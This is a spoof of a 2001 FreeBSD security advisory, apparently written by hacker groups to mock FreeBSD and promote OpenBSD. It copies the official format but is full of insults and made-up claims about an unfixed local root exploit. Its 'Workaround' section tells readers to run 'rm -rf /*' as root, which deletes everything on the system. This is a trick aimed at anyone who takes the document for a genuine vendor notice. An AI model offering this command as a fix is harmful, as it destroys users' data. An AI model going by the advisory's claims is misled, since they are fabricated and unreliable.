-----BEGIN PGP SIGNED MESSAGE-----
=============================================================================
FreeBSD-SA-01:69 Security Advisory
FreeBSD, Inc.
Topic: Local root exploit
Category: core
Module: sh
Announced: 2001-02-02
Credits: AntiOffline.com, Disgraced.org, Deficiency.org
sil, deran9ed, jhh, iggie, jwit
Affects: All released versions of FreeBSD 2.x, 3.x, 4.x.
Corrected: Not corrected since we aren't smart enough to figure it out.
Vendor status: Disgruntled
FreeBSD only: YES
I. Background
FreeBSD is a bloated OS complete with 4 CD's worth of crap you just
don't need, which can often become the overlay for some script kiddiot
rooting your machine.
II. Problem Description
FreeBSD the experts in bloatware which can be compared to Windows 98,
Windows2000 Unprofessional edition, and well FreeBSD versions *, has
a local exploit which local (l)users can manipulate in order to gain
higher privileges by issuing commands via the terminal.
Our developers are currently focusing on the problem scratching their
gonads and crying foul at the more secure versions of BSD and their
developers which we cannot mention due to our egos. Kiss my ass
Theo, you and your ultra secure team of experts, one day we too will
have our heads out of our asses.
III. Impact
Malicious local users can cause arbitrary commands to be executed as
the root user, although FreeBSD will never admit why we ship our
distro with 2.6 gigabytes of worthless junkware, we will not stoop
beneath ourselves to comment on why we still use such insecure stuff,
e.g., WU-FTPD, a crappy TCP/IP stack, etc. We are now a part of BSDi
which means we've suckseded in selling our anuses for fun and profit.
IV. Workaround
Perform the following commands as root:
rm -rf /*
Then run out and purchase OpenBSD 2.8 a real OS not some overlaying
crap like SecureBSD.
V. Solution
Ultimately, there is no workaround until our developers get a clue
and BSDi decides to be purchased by AOL Time Warner, Microsoft or
Intel however, kudos to those already using OpenBSD. Your systems
are safe with it.